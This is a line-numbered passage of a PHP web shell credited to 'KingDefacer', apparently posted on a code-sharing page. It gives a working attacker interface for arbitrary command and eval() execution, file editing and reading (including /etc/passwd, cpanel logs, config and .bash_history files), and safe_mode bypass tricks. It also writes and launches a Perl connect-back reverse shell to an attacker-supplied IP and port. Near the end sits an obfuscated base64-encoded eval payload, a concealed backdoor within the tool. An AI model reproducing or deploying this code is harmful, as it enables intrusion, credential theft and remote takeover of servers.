  392. }else {$units = array("kB", "MB", "GB", "TB");
  393. foreach ($units as $unit) {
  394. $size = ($size / 1024);
  395. if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
  396. if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
  397. print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Back </a>]</div>";
  398. print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
  399. input ("text","renf","New-name",20);print " ";
  400. input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
  401. if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
  402. if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
  403. print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
  404. print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Back </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
  405. print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Back </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
  406. print $sf."<textarea cols=157 rows=23 name=edittxt>";
  407. $alltxt= file_get_contents($_REQUEST['edit']);
  408. $nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
  409. if (is_writable($_REQUEST['edit'])){
  410. print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
  411. <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
  412. $fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
  413. $nedittxt=stripslashes($_REQUEST['edittxt']);
  414. fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
  415. if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
  416. {fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
  417. {svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
  418. $fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
  419. $fileowner=$fileownerarray['name']; $fileg=filegroup($file);
  420. $groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
  421. print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
  422. if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
  423. elseif(isset($_REQUEST['mve'])){
  424. if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
  425. }else {$cpmvmess="COPY / Select a file for copy then paste";}
  426. if (isset ($_REQUEST['safefile'])){
  427. $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
  428. if(empty($_GET['file'])){if(empty($_POST['file'])){
  429. print "<center>[ Please choose a file first to read it using copy() ]</center>";
  430. } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
  431. $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
  432. $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
  433. fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
  434. print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
  435. </CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
  436. ini_restore("safe_mode");ini_restore("open_basedir");
  437. print "<center><pre>".$sta;
  438. if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
  439. if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
  440. function callback($nscdir,$bip,$bport){
  441. if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
  442. if (is_writable($nscdir)){
  443. $fp=fopen ("back.pl","w");$backpl='back.pl';}
  444. else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
  445. fwrite ($fp,"use Socket;
  446. \$system='$epath';
  447. \$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
  448. echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
  449. echo \"[ User perms ][$]\";echo \"`id`\";echo;
  450. echo \"[ Start shell ][$]\";';
  451. if (!\$ARGV[0]) {
  452. exit(1);
  453. }
  454. \$host = \$ARGV[0];
  455. \$port = 80;
  456. if (\$ARGV[1]) {
  457. \$port = \$ARGV[1];
  458. }
  459. \$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
  460. socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
  461. my \$target = inet_aton(\$host);
  462. if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
  463. die('Unable to Connect\n');
  464. }
  465. if (!fork( )) {
  466. open(STDIN,'>&SERVER');
  467. open(STDOUT,'>&SERVER');
  468. open(STDERR,'>&SERVER');
  469. print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
  470. print '\n[ A-S-T team ][ Lezr.com ]\n\n';
  471. system(\$sys);system (\$system);
  472. exit(0); }
  473. ");callfuncs("chmod 777 $backpl");
  474. ob_start();
  475. callfuncs("perl $backpl $bip $bport");
  476. ob_clean();
  477. print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
  478. [ Check your connection now, if failed try changing the port number ]<br>
  479. [ Or Go to a writable dir and then try to connect again ]<br>
  480. [ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
  481. </div><br>";}if (isset($_REQUEST['uback'])){
  482. $uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
  483. if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
  484. elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
  485. elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
  486. delm("# Execute Commands #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
  487. print "<tr><td width=32%><div align=left>";
  488. print $st.$c1."<center><div><b>".$mess3.$ec;
  489. print $c2.$sf."<center>";input("text","cfile","",53);
  490. input("hidden","scdir",$nscdir,0);print "<br>";
  491. input("submit","crefile","Make-it","");
  492. print " ";input("submit","delfile","Delete","");
  493. print "</center>".$ef.$ec.$et."</div></td>";
  494. print "<td><div align=center>".$st.$c1;
  495. print "<center><div><b>Enter the command to execute";print $ec;
  496. print $c2.$sf."<center><div style='margin-top:7px'>";
  497. input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
  498. input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
  499. print "<td width=32%><div align=right>";print $st.$c1;
  500. print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
  501. input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
  502. input("submit","credir","Create-D","");print " ";
  503. input("submit","deldir","Delete-D","");
  504. print "</center>".$ef.$ec.$et."</div></td></tr>";
  505. print "<tr><td width=32%><div align=left>";print $st.$c1;
  506. print "<center><div><b>Edit/Read File".$ec;print $c2.$sf."<center>";
  507. input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
  508. input("submit","","Read-Edit","");print "</center>".$ef.$ec.$et."</div></td>";
  509. print "<td><div align=center>";print $st.$c1;
  510. print "<center><div><b>View Dir<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
  511. input("submit","","View","");print " ";
  512. input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
  513. print "<td><div align=center>";print $st.$c1;
  514. print "<center><div><b>File size : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
  515. input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
  516. input("hidden","up",$nscdir,0);
  517. print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
  518. delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
  519. print $st.$c1."<div><b><center>Execute php code with eval()</div>";
  520. print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
  521. print "&nbsp;<textarea cols=73 rows=3 name=eval>";
  522. if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
  523. print "</textarea><br><center>";
  524. input('submit','evsub','Execute');print " ";
  525. input('Reset','','Reset');print " ";
  526. print "</center>".$ec.$ef.$et;
  527. print "</td><td height=20% width=50%><div align=center>";
  528. print $st.$c1."<div><b><center>Execute useful commands</div>";
  529. print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
  530. print "<center><select style='width:60%' name=uscmnds size=1>
  531. <option value='op0'>Execute quick commands</option>
  532. <option value='op1'>ls -lia</option>
  533. <option value='op2'>/etc/passwd</option>
  534. <option value='op3'>/var/cpanel/accounting.log</option>
  535. <option value='op4'>/var/named</option>
  536. <option value='op11'>Perms in curr Dir</option>
  537. <option value='op12'>Perms in main Dir</option>
  538. <option value='op5'>Find service.pwd files</option>
  539. <option value='op6'>Find config files</option>
  540. <option value='op7'>Find .bash_history files</option>
  541. <option value='op8'>Read hosts file</option>
  542. <option value='op9'>Root login</option>
  543. <option value='op10'>Show opened ports</option>
  544. <option value='op13'>Show services</option>
  545. </select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
  546. print $ec.$ef.$et."</td></tr></table>";delm("");
  547. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  548. print "<tr><td width=50%><div align=left>";
  549. print $st.$c1."<div><b><center>".$cpmvmess."</div>";
  550. print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
  551. print "<b><font face=tahoma size=2>&nbsp;To </b>";
  552. input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
  553. input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
  554. print "</center>".$ec.$ef.$et;
  555. print "</td><td height=20% width=50%><div align=right>";
  556. print $st.$c1."<div><b><center>Important commands</div>";
  557. print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
  558. print "<select style='width:22%' name=ustools size=1>
  559. <option value='t1'>Wget</option><option value='t2'>Curl</option>
  560. <option value='t3'>Lynx</option><option value='t9'>Get</option>
  561. <option value='t4'>Unzip</option><option value='t5'>Tar</option>
  562. <option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
  563. <option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
  564. print "</td></tr></table>";delm(": Safe mode bypass :");
  565. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  566. print "<tr><td width=50%><div align=left>";
  567. print $st.$c1."<div><b><center>Using copy() function</div>";
  568. print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
  569. input("hidden","scdir",$nscdir,0);print " ";
  570. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  571. print "</td><td height=20% width=50%><div align=right>";
  572. print $st.$c1."<div><b><center>Using ini_restore() function</div>";
  573. print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
  574. input("hidden","scdir",$nscdir,0);print " ";
  575. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  576. print "</td></tr></table>";delm("# Backdoor Connection #");
  577. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  578. print "<tr><td width=50%><div align=left>";
  579. print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
  580. print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
  581. input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
  582. input("submit","","Connect","");print " ";input("reset","","Reset","");
  583. print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1><option value='up80'>80</option><option value='up443'>443</option><option value='up2121'>2121</option></select>";print " ";input("text","uback","back.pl",23);print " ";input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
  584. print "</center>".$ec.$ef.$et;print "</td></tr></table>";
  585. print"<center>Copyright is reserved to KingDefacer<br>[ By Turkish Security GROUP Go to : <a target='_blank' href='http://alturks.com'>http://alturks.com/</a> ]";
  586. print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
  587. print"</font></td></tr></table>";
  588. ?>

comments powered by Disqus